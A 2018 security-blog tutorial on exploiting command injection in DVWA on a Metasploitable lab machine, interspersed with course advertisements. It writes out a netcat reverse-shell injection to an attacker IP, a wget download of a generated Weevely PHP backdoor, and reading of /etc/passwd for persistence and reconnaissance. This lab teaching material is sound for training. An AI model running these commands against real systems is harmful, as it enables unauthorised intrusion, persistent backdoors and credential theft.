![\"network\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/network.png?w=900\")
<\/p>\nWelcome back my budding hackers. We hope you enjoy this security tutorial by our ethical hacker QuBits. Our network is below.<\/p>\n
<\/p>\n
We will be creating a backdoor in DVWA Command Execution module, which is a web app on Metasploitable.<\/p>\n
![\"wee1\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee1.png?w=900\")
<\/p>\n
To start with, change the security settings from high to low on DVWA Security Tab above.<\/p>\n
![\"wee2\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee2.png?w=900\")
<\/p>\n
Next we will need to move to the Command Execution module. The page just does a ping scan. so let\u2019s try it.<\/p>\n
![\"wee3\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee3.png?w=900\")
<\/p>\n
We will enter an IP address and click on submit.<\/p>\n
REGISTER TODAY FOR YOUR KUBERNETES FOR DEVELOPERS (LFD259) COURSE AND CKAD CERTIFICATION TODAY! $499!<\/a><\/p>\n Let see if it will also run other commands other than ping. We will try to run a Netcat command in the text box so on the Kali machine command line type:<\/p>\n nc -vv -l -p 8888 (8888 is the port we want to listen on)<\/p>\n Next, in DVWA, type any IP then ; then nc -e \/bin\/sh 192.168.56.103 8888 and connect with Kali machine from website as seen below.<\/p>\n Connection established, we have full control of the web app.<\/p>\n $299 WILL ENROLL YOU IN OUR SELF PACED COURSE \u2013 LFS205 \u2013 ADMINISTERING LINUX ON AZURE!<\/a><\/p>\n Now we have full command line controls on the website we can run any commands we wish. We want to create a persistent back door now and upload it to the website.<\/p>\n First we need to generate a backdoor with Weevely, back on the Kali machine, in a new console window type:<\/p>\n weevely generate 123456 \/root\/shell.txt. 123456 will be our password which we will use later.<\/p>\n Copy it to:<\/p>\n cp \/root\/shell.txt \/var\/www\/html so we can see it in our browser.<\/p>\n Make sure it\u2019s copied. shell.txt is in \/var\/www\/html. We can see shell.txt on the right hand side.<\/p>\n Next we start the server on the Kali machine. Start the server:<\/p>\n service apache2 start<\/p>\n On Kali browser go to 192.168.56.103\/shell.txt or localhost\/shell.txt to confirm file is there.<\/p>\n We still have a netcat connection on the server so we can wget our shell.txt file:<\/p>\n wget http:\/\/192.168.56.103\/shell.txt<\/a> and the shell.txt should show uploaded<\/p>\n The file has been uploaded, next we need to change it to php extension for it to run.<\/p>\n Mv shell.txt shell.php<\/p>\n Connect to the upload in Kali:<\/p>\n weevely http:\/\/192.168.56.101\/dvwa\/vulnerabilities\/shell.php 123456<\/a><\/p>\n We are connected with a backdoor in DVWA. NOW we have the backdoor in DVWA we can run some helpful commands, for instance.<\/p>\n :help this will give you a list of commands you can run on your back door. Interesting ones are:<\/p>\n :system_info<\/p>\n cat \/etc\/passwd<\/p>\n Another interesting command we can use is :audit_etcpasswd -vector <option><\/p>\n To upload a file to the target system:<\/p>\n :file_download rpath is remote path and lpath for local.<\/p>\n So have a play around with Weevely when you pop your next server.<\/p>\n Thanks for reading and don\u2019t forget to comment, like and of course, follow our blog for future tutorials.<\/p>\n QuBits 2018-09-13<\/p>\n BUNDLE CLOUD FOUNDRY FOR DEVELOPERS COURSE(LFD232) AND THE CFCD CERTIFICATION FOR $499!<\/a><\/p>\n![\"wee4\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee4.png?w=900\")
<\/p>\n![\"wee5\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee5.png?w=900\")
<\/p>\n![\"wee6\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee6.png?w=900\")
<\/p>\n![\"wee7\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee7.png?w=900\")
<\/p>\n![\"wee8\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee8.png?w=900\")
<\/p>\n![\"wee9\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee9.png?w=900\")
<\/p>\n![\"wee10\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee10.png?w=900\")
<\/p>\n![\"wee11\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee11.png?w=900\")
<\/p>\n![\"wee12\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee12.png?w=900\")
<\/p>\n![\"wee13\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee13.png?w=900\")
<\/p>\n![\"wee18\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee18.png?w=900\")
<\/p>\n![\"wee20\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee20.png?w=900\")
<\/p>\n![\"wee21\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee21.png?w=900\")
<\/p>\n![\"wee22\"](\"https:\/\/linuxsecurityblog.files.wordpress.com\/2018\/09\/wee22.png?w=900\")
<\/p>\n